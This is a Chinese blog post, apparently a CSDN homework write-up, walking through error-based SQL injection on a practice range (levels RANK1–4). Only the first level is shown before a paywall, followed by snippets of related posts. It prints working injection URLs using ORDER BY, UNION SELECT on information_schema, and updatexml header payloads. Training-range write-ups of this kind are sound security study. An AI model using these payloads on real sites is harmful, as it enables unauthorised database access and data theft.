SQL注入靶场作业——显错注入RANK1~4

最新推荐文章于 2022-12-14 16:22:40 发布
最新推荐文章于 2022-12-14 16:22:40 发布
阅读量283 收藏
点赞数 1
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45540609/article/details/115698922
版权
本文详细记录了四个不同级别(RANK1至RANK4)的SQL注入漏洞利用过程,包括查看SQL漏洞、猜字段、找回显点、查询系统库获取表名和字段名,以及最终获取数据。通过示例URL展示如何通过注入查询获取信息。
摘要由CSDN通过智能技术生成

RANK1

一、查看是否有SQL漏洞

id=2和id=4-2回显相同内容,说明有SQL注入漏洞

二、猜字段

http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 4

说明只有3个字段

三、查找回显点

2,3字段会显示,所以第2,3字段是回显点

四、系统自带库查找表名,字段名

http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1.22222%20union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1

查找到第一个表就是error_flag

第二个表是user

查找字段flag,在第三个字段

http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1%20union select 1,2,column_name from information_schema.columns where table_name='error_flag' and table_schema=database() limit 1,1

http://inject2.lab.aqlab.cn:81/Pa

最低0.47元/天 解锁文章
玛卡巴卡巴巴亚卡
关注
专栏目录
Webug靶场之旅——显错注入
weixin_53953503的博客
08-18 807
显错注入 显错注入SQL注入的一种,而SQL注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入漏洞产生的条件:  1、用户能够控制数据的输入。  2、原本执行需要执行的代码时,拼接了用户的输入。 打开webug靶场,打开id为1的靶场后,如图: 这里我们使用工具的是Hackbar2.1.3版本,这个是免费的。 首先,我们需要判断是否存在SQL注入。在参数后面多加一个单引号,然后将它上传,发现报错了 通过页面的返回结果,
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1293
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
SQL注入-显错注入Rank 1
purvispanwu的博客
12-18 2494
网络安全,sql注入
mysql注入靶场_SQL注入靶场显错注入Rank1-4
weixin_39535557的博客
02-28 117
----------------------------- Rank 1 -----------------------------------------------先添加 id=1 参数进行访问:image.png再用 id=1' 进行注入测试:image.png从报错信息可以看到用的MySQL数据库。获取字段数:image.pngimage.png使用 id=0' 或者 id=1' and ...
SQL注入----显错注入Rank1--4
weixin_46735316的博客
04-13 709
4.1.1 SQL注入-显错注入 Rank 1 1.判断是否存在注入点: 在正常输入后面添加and 1=1 #查看是否正常回显。如果一切正常说明该处存在注入点。 2.猜解字段数 每一个数据库查询语句的结果都是一个表格,使用order by查询字段数,尝试到页面返回错误得出字段数。 得出字段数为3 3.查询联合输出点 用and 1=2 union select 1,2,3#查询(或者 un...
显错注入(四)
qq_45300786的博客
07-02 360
显错注入(四) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1 SQL注入原理解析以及举例1   sql注入是指web应用程序对用户输入数据的合法性没有判断, 导致攻击者可以构造不同的sql语句来实现对数据库的操作。   sql注入漏洞产生满足条件:     1;用户能够控制数据的输入。     2;原本需要执行的代码,拼接了用户的输入。  举例:   注意:下面测试环境使用封神台免费靶场。可以从下面链接进入:https://hack.z
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3787
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
sql注入靶场实操
m0_46104808的博客
10-27 1628
sql注入漏洞利用
封神台SQL注入-基础靶场1-显错注入
原味瓜子、的博客
09-28 1422
一、显错注入 Pass-01 判断注入类型 id=1 //有回显 id=1' // No results found 判断为数字型注入 判断有几列 id=1 order by 3 //有回显 id=1 order by 4 // No results found 判断有三列 判断回显点 id=1 union select 1,2,3 ...
SQL注入显错注入
kagariiiii的博客
03-28 295
Sql注入 原理:将用户输入的数据当做sql语句来执行 两个条件:1.用户能用控制输入的内容 2.程序原本要执行的代码拼接了用户的数据执行 pass-01 1.由url判断为get传参 2.输入?id=1 and 1=1,页面显示正常 输入?id=1 and 1=2,页面显示错误 由此判断为数字型注入且有回显 3.输入?id=1 order by 4 页面显示错误 输入?id=1 order by 3 页面显示正常 由此判断当前表中字段数为3 4.使用联合查询 输入?id=1 and 1=2 union s
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py web_chinaz 10 web_chinaz 为应用文件名称,10表示要生成的队伍数量 start.py python start.py 10 启动10个实例,以及check和flag服务。 stop_clean.py python stop_clean.py 暂停所有服务,并删除临时文件 注意,这里会删除所有现运行的容器,请谨慎使用。 pass.txt 存储队伍用户名密码,以及ssh、web端口 team01 ctf:308d66 ssh:2201 port:8801 team02 ctf:024b1d ssh:2202 po
靶场练习--sqli(3&4)
07-14 133
第三关 先解决一下第二关遗留下来的问题,嘻嘻。看来数据库原理应当过一遍~ 1.首先判断是否有SQL注入,然后再看是数字型、字符型。发现这里是字符型。 2.order by 查询字段数,记得后面要加一个--+注释符,而这个+一般显示不出来, 发现一个错误回显,是(),构造一个闭合; 3.看一下所在数据库,查看有哪些数据库 4.查看securit...
SQL注入---Post注入----Rank1---2
weixin_46735316的博客
04-13 356
4.2.1-SQL注入-POST注入Rank 1 1.查询是否有注入点 对输入框填入一些闭合的符号,看页面是否异常。在输入框输入’,页面正常,证明’闭合有效 2.猜解字段数 order by 查询字段数 得出字段数为3 3.union联合查询输出点 4.查询当前数据库名 ’ union select 1,2,database()# 得出数据库名为post_error 5.查询post_...
[zkaq靶场]SQL注入--Header注入
wwxxee
05-08 274
SQL注入–Header注入 Header注入一 登录成功后,浏览器会存储一些信息. 此处经过判断为User-Agent字段. 抓包如下: 使用报错注入:由于updatexml的第二个参数需要xpath 格式的字符串,concat函数用~符号开头不是xml的语法,所以就会将括号内的执行结果以错误的形式报出,这样就实现了报错注入。 对User-Agent字段进行注入. User-Agent: 1' or updatexml(1,(concat(0x7e,(select database()))),1) a
SQL注入靶场实战-小白入门
m0_59246409的博客
06-12 538
2.order by 语句判断字段长,查出字段为3 3.猜出字段位(必须与内部字段数一致)(用union联合查询查看回显点为2,3) 5.联合查询(group_concat())点代表下一级,猜解当前数据库pentest中所有的表名。 6.猜列名( account 表和 news 表) 2.接下来利用order by判断字段长,带入SQL查询语句可直接查询出数据(查询语句和数字型一样) 1.搜索型需要多闭合一个%,其他都与前面类似 SQL...
SQL注入--显错注入
最新发布
weixin_48803011的博客
12-14 757
显错注入就是通过sql注入再利用网页的显示位进行数据的读取
猫舍-sql注入
tlucky的博客
04-16 2527
漏洞地址 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 漏洞类型 Sql注入 漏洞描述及危害 sql注入是一种将sql代码插入或添加到应用用户的输入参数中,再将这些参数传递给后台的sql服务器加以解析并执行。Sql注入会导致数据库信息泄露,网页被篡改,数据库被恶意操作,服务器被远程控制和被种植木马等多种危害。 漏洞详情 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 属于数字型注入 ①数据库名 ②表名 http://
封神台靶场writeup
weixin_44155363的博客
06-06 6933
封神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场 查看源码,找到了字典文件; 用域名爆破工具,放入字典后爆破;答案为:http://8adc3387c2ed6cce.lab.aqlab.cn:81 aqlab.cn 一级域名 lab为二级域名 kali01就是三级域名; https://site.ip138.com/ 这个网站能通过同ip网站能直接查处结果; shop.aqlab.cn:8001 nmap完全扫描可发现,快速扫描无法发现; n
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值